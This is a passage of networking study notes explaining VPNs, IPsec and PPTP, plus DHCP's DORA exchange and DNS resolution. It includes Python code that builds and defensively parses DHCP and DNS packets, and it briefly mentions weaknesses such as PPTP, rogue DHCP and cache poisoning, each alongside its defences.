Wireless networks continue to evolve, with WiFi 6 and WiFi 7 improving speed, security, and efficiency for modern applications.


Virtual Private Networks (VPN)

Methodology

A Virtual Private Network (VPN) establishes a secure, encrypted connection between a remote device and a private network. This allows users to securely access internal network resources, such as file servers and databases, from remote locations. VPNs work by tunneling network traffic over the public internet while encrypting the data to prevent interception.

Key Components of a VPN:

  1. VPN Client – Installed on the remote device to initiate and maintain a VPN connection. (e.g., OpenVPN client)
  2. VPN Server – Manages VPN connections and routes traffic between the client and private network.
  3. Encryption – Ensures secure communication using protocols like AES and IPsec.
  4. Authentication – Uses credentials, shared secrets, or certificates to verify users.

VPN Uses and Benefits

  • Secure Remote Access: Employees can safely access internal services from anywhere.
  • Data Encryption: Prevents attackers from intercepting confidential information.
  • Cost-Effective: Uses the public internet instead of expensive dedicated connections.
  • Site-to-Site Connectivity: Connects multiple branch offices into a unified network.

Limitations

  1. Performance Issues – Encryption and tunneling overhead reduce throughput and add latency.
  2. Compatibility – Native IPsec (ESP, UDP/500) is often blocked by firewalls and NAT; NAT-T on UDP/4500 or a TLS-based VPN on TCP/443 gets through more reliably.
  3. Security Risks – Misconfigured VPNs (weak pre-shared keys, IKEv1 aggressive mode, unpatched gateways) expose the whole internal network, and the gateway is an attractive target precisely because it must be reachable from the internet.
  4. Centralized Trust – Whoever operates the VPN endpoint sees all tunneled traffic once it is decrypted, so the VPN protects the transport, not the data from the provider.

IPsec (Internet Protocol Security)

A network security protocol used to encrypt and authenticate internet communications. It secures data by encrypting the payload of each IP packet and verifying its integrity.

IPsec Protocols:

  1. Authentication Header (AH) – Integrity and origin authentication for the whole packet, including immutable IP header fields, but no confidentiality; because the header is covered by the check, AH does not survive NAT.
  2. Encapsulating Security Payload (ESP) – Encrypts the payload and optionally authenticates it; in practice VPNs use ESP with integrity (or an AEAD cipher such as AES-GCM), and encryption without integrity should not be configured.

IPsec Modes:

Mode Description
Transport Mode Encrypts only the data payload, leaving the IP header exposed. Used for host-to-host communication.
Tunnel Mode Encrypts both the data and the IP header, ideal for VPN tunnels between networks.

Protocols and Ports Required for IPsec VPN:

Protocol | Port / IP protocol | Description
ESP (Encapsulating Security Payload) | IP protocol 50 (not a port) | Encrypts and authenticates the tunneled packets.
AH (Authentication Header) | IP protocol 51 (not a port) | Authenticates packets without encryption.
IKE (Internet Key Exchange) | UDP/500 | Negotiates security associations and keys.
NAT Traversal (NAT-T) | UDP/4500 | Encapsulates IKE and ESP in UDP when a NAT sits in the path.

Firewalls in front of a gateway must therefore permit IP protocols 50 and 51 as well as the two UDP ports; opening "ports 50 and 51" does nothing.

PPTP (Point-to-Point Tunneling Protocol)

A VPN protocol that tunnels PPP over GRE with a TCP/1723 control channel. While still widely supported, PPTP is outdated and insecure: its MS-CHAPv2 authentication reduces to a single DES key that can be recovered offline from a captured handshake, and the MPPE (RC4) session keys are derived from those same credentials, so the traffic can then be decrypted.

Modern Alternatives to PPTP:

  • L2TP/IPsec – An L2TP tunnel protected by IPsec; commonly deployed with pre-shared keys, which must be strong and rotated.
  • IPsec/IKEv2 – Strong security, certificate or EAP authentication, and MOBIKE support for surviving network changes.
  • OpenVPN – TLS-based, open-source, widely adopted and firewall-friendly (it can run on TCP/443).

VPN technology continues to evolve, with WireGuard and Zero Trust Network Access (ZTNA) emerging as the next-generation solutions for secure remote access.


DHCP

What is DHCP?
Dynamic Host Configuration Protocol (DHCP) is a network protocol that automatically assigns IP addresses and other network settings (like subnet mask, gateway, and DNS) to devices. This eliminates the need for manual IP configuration and prevents address conflicts.

How DHCP Works (DORA Process):

  1. Discover – A device (DHCP client) sends a broadcast message to find a DHCP server.
  2. Offer – The DHCP server responds with an available IP address offer.
  3. Request – The client requests to use the offered IP address.
  4. Acknowledge – The server confirms the assignment, and the device can now use the IP.

IP Lease and Renewal:

  • The assigned IP is temporary (leased for a set time).
  • Before the lease expires, the device requests a renewal.
  • If approved, the lease extends; otherwise, a new IP is assigned.

Example Scenario:
Alice connects her laptop to the office Wi-Fi. The laptop requests an IP, the DHCP server offers one (e.g., 192.168.1.10), Alice’s laptop accepts, and the server confirms. This process ensures seamless network connectivity.
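The DORA exchange in bytes, as an added example written for this page (not code from the original page): it builds the DISCOVER a client broadcasts, a constructed OFFER of the kind the server returns (192.168.1.10 as in the scenario above), and a parser for the BOOTP header and DHCP option list that refuses malformed input. The MAC address, transaction ID, lease time and server addresses are invented for illustration.

```python
import ipaddress
import struct
from typing import Dict, List

DHCP_MAGIC = b"\x63\x82\x53\x63"  # RFC 2131 magic cookie that follows the 236-byte BOOTP header
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 4: "DECLINE", 5: "ACK", 6: "NAK", 7: "RELEASE", 8: "INFORM"}
# op htype hlen hops xid secs flags ciaddr yiaddr siaddr giaddr chaddr sname file
BOOTP_HDR = "!BBBBIHH4s4s4s4s16s64s128s"


def _opt(code: int, value: bytes) -> bytes:
    return bytes([code, len(value)]) + value


def _ip(addr: str) -> bytes:
    return ipaddress.IPv4Address(addr).packed


def build_discover(xid: int, client_mac: bytes) -> bytes:
    """DHCPDISCOVER: BOOTREQUEST over Ethernet, broadcast flag set, option 53=1 plus a parameter request list."""
    header = struct.pack(BOOTP_HDR, 1, 1, 6, 0, xid, 0, 0x8000, b"\0" * 4, b"\0" * 4, b"\0" * 4, b"\0" * 4,
                         client_mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    options = _opt(53, b"\x01") + _opt(55, bytes([1, 3, 6, 51])) + b"\xff"
    return header + DHCP_MAGIC + options


def build_offer(xid: int, client_mac: bytes, your_ip: str, server_ip: str, mask: str,
                router: str, dns: str, lease_seconds: int) -> bytes:
    """DHCPOFFER as a server would answer the DISCOVER above (constructed; yiaddr carries the offered address)."""
    header = struct.pack(BOOTP_HDR, 2, 1, 6, 0, xid, 0, 0, b"\0" * 4, _ip(your_ip), _ip(server_ip), b"\0" * 4,
                         client_mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)
    options = (_opt(53, b"\x02") + _opt(1, _ip(mask)) + _opt(3, _ip(router)) + _opt(6, _ip(dns))
               + _opt(51, struct.pack("!I", lease_seconds)) + _opt(54, _ip(server_ip)) + b"\xff")
    return header + DHCP_MAGIC + options


def parse_dhcp(packet: bytes) -> Dict[str, object]:
    """Parse a BOOTP/DHCP packet; raises ValueError on malformed input instead of reading past the buffer."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet (short or missing magic cookie)")
    op, _htype, hlen, _hops, xid, _secs, flags = struct.unpack("!BBBBIHH", packet[:12])
    if not 0 < hlen <= 16:
        raise ValueError("invalid hardware address length")
    yiaddr, siaddr, giaddr = (str(ipaddress.IPv4Address(packet[i:i + 4])) for i in (16, 20, 24))
    options: Dict[int, bytes] = {}
    i = 240
    while i < len(packet):
        code = packet[i]
        if code == 255:  # END
            break
        if code == 0:  # PAD
            i += 1
            continue
        if i + 2 > len(packet) or i + 2 + packet[i + 1] > len(packet):
            raise ValueError(f"truncated option {code}")
        length = packet[i + 1]
        options[code] = options.get(code, b"") + packet[i + 2:i + 2 + length]  # RFC 3396: split options concatenate
        i += 2 + length

    def ip_list(code: int) -> List[str]:
        raw = options.get(code, b"")
        return [str(ipaddress.IPv4Address(raw[j:j + 4])) for j in range(0, len(raw) - 3, 4)]

    return {
        "op": "BOOTREQUEST" if op == 1 else "BOOTREPLY",
        "xid": xid,
        "broadcast": bool(flags & 0x8000),
        "client_mac": packet[28:28 + hlen].hex(":"),
        "your_ip": yiaddr, "server_ip": siaddr, "relay_ip": giaddr,
        "message_type": MSG_TYPES.get(options[53][0], "UNKNOWN") if options.get(53) else "BOOTP",
        "subnet_mask": ip_list(1)[0] if 1 in options else None,
        "routers": ip_list(3),
        "dns": ip_list(6),
        "lease_seconds": struct.unpack("!I", options[51])[0] if len(options.get(51, b"")) == 4 else None,
        "server_identifier": ip_list(54)[0] if 54 in options else None,
    }


def offer_matches(discover: bytes, offer: bytes) -> bool:
    """A client must only accept an OFFER whose xid and chaddr echo its own DISCOVER (basic stray-reply filter)."""
    d, o = parse_dhcp(discover), parse_dhcp(offer)
    return (o["op"] == "BOOTREPLY" and o["message_type"] == "OFFER"
            and d["xid"] == o["xid"] and d["client_mac"] == o["client_mac"])
```

The xid/chaddr check is the only matching a client performs: DHCP has no authentication, so any host on the segment can answer a DISCOVER with its own router and DNS options. That is why switches offer DHCP snooping (only trusted ports may send OFFER/ACK) and why a rogue DHCP server is an easy man-in-the-middle position on a flat LAN.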

Why DHCP?

  • Automates IP assignment → Reduces manual work.
  • Prevents conflicts → Ensures unique IPs.
  • Efficient resource use → Recycles unused IPs.

DHCP simplifies network management, making it essential for both small and large networks.


DNS

What is DNS?

The Domain Name System (DNS) is like the internet's phonebook. It translates human-friendly domain names (e.g., www.example.com) into machine-readable IP addresses (e.g., 93.184.216.34), allowing us to access websites without memorizing numbers.

DNS Hierarchy

DNS is structured in a layered system:

  1. Root Servers – The top level of DNS, directing queries to relevant TLD servers.
  2. Top-Level Domains (TLDs) – Includes extensions like .com, .org, .net, or country codes like .uk.
  3. Second-Level Domains – The main part of a website name (e.g., "example" in example.com).
  4. Subdomains/Hostnames – Further divisions within a domain (e.g., "www" in www.example.com or "mail" in mail.google.com).

How DNS Works (DNS Resolution Process)

  1. The user enters a domain (e.g., www.example.com) in a web browser.
  2. The computer first checks its local DNS cache for a saved IP address.
  3. If not found, it queries a Recursive DNS Server (provided by ISPs or services like Google DNS).
  4. The recursive server contacts a Root Server, which directs it to the correct TLD Server (e.g., .com servers).
  5. The TLD Server then directs the request to the Authoritative Name Server for example.com.
  6. The authoritative server provides the correct IP address.
  7. The recursive server returns the IP to the user's computer, allowing it to connect to the website.
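What the query and answer in steps 1-7 look like on the wire, as an added example written for this page (not code from the original page). It builds a standard A query, parses a response including RFC 1035 name compression, and checks the transaction ID so that a reply that does not belong to our query is rejected rather than cached. The response it parses is constructed inside the block with the www.example.com / 93.184.216.34 pair used above; the transaction ID and TTL are invented.

```python
import ipaddress
import struct
from typing import Dict, List, Tuple

RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 4: "NOTIMP", 5: "REFUSED"}
TYPE_A, TYPE_CNAME = 1, 5


def encode_name(name: str) -> bytes:
    """'www.example.com' -> 3www7example3com0 (length-prefixed labels with a zero terminator)."""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(txid: int, name: str, qtype: int = TYPE_A) -> bytes:
    """Standard query: 12-byte header (RD=1, QDCOUNT=1) followed by one question in class IN."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)


def decode_name(msg: bytes, offset: int) -> Tuple[str, int]:
    """Decode a name that may use compression pointers (0xC0xx = continue at offset xx).

    Returns (name, offset of the byte after the name at its original position). Pointers must point
    strictly backwards, so a crafted loop (C0 00 at offset 0) raises instead of spinning forever."""
    labels: List[str] = []
    resume = None
    while True:
        if offset >= len(msg):
            raise ValueError("truncated name")
        length = msg[offset]
        if length & 0xC0 == 0xC0:
            if offset + 2 > len(msg):
                raise ValueError("truncated pointer")
            target = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if target >= offset:
                raise ValueError("forward or self-referencing compression pointer")
            if resume is None:
                resume = offset + 2
            offset = target
            continue
        if length == 0:
            offset += 1
            break
        if length > 63 or offset + 1 + length > len(msg):
            raise ValueError("bad label")
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), (resume if resume is not None else offset)


def parse_response(msg: bytes, expected_txid: int) -> Dict[str, object]:
    """Parse header, question and answer sections; rejects replies whose ID does not match our query."""
    if len(msg) < 12:
        raise ValueError("short DNS message")
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid:
        raise ValueError("transaction ID mismatch: reply does not belong to our query")
    if not flags & 0x8000:
        raise ValueError("QR bit clear: this is a query, not a response")
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        name, offset = decode_name(msg, offset)
        if offset + 4 > len(msg):
            raise ValueError("truncated question")
        qtype, _qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        if offset + 10 > len(msg):
            raise ValueError("truncated resource record")
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        if offset + rdlen > len(msg):
            raise ValueError("truncated RDATA")
        if rtype == TYPE_A and rdlen == 4:
            data = str(ipaddress.IPv4Address(msg[offset:offset + 4]))
        elif rtype == TYPE_CNAME:
            data, _ = decode_name(msg, offset)  # CNAME targets are usually compressed too
        else:
            data = msg[offset:offset + rdlen].hex()
        offset += rdlen
        answers.append({"name": name, "type": rtype, "ttl": ttl, "data": data})
    return {"rcode": RCODES.get(flags & 0xF, str(flags & 0xF)), "authoritative": bool(flags & 0x0400),
            "truncated": bool(flags & 0x0200), "questions": questions, "answers": answers}


def build_a_response(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """Constructed reply to build_query(): echoes the question and answers with one A record whose owner
    name is the compression pointer C0 0C (offset 12, where the question name starts)."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1, RD=1, RA=1, NOERROR
    answer = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_A, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
    return header + query[12:] + answer
```

The 16-bit transaction ID plus a random source port are all that protect a plain UDP resolver from accepting a forged answer, which is why cache-poisoning defences focus on randomizing both and why the pointer bounds check above matters: a response that sends the parser into a loop is the cheapest denial of service against a resolver.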

This process happens in milliseconds, making internet browsing fast and seamless.

Why is DNS Important?

  • User-Friendly – Allows easy access to websites using names instead of numbers.
  • Efficient – Reduces the need for manual IP address management.
  • Fast Caching – Speeds up browsing by storing frequently used IP addresses.

DNS is a fundamental part of the internet, ensuring quick and reliable access to websites.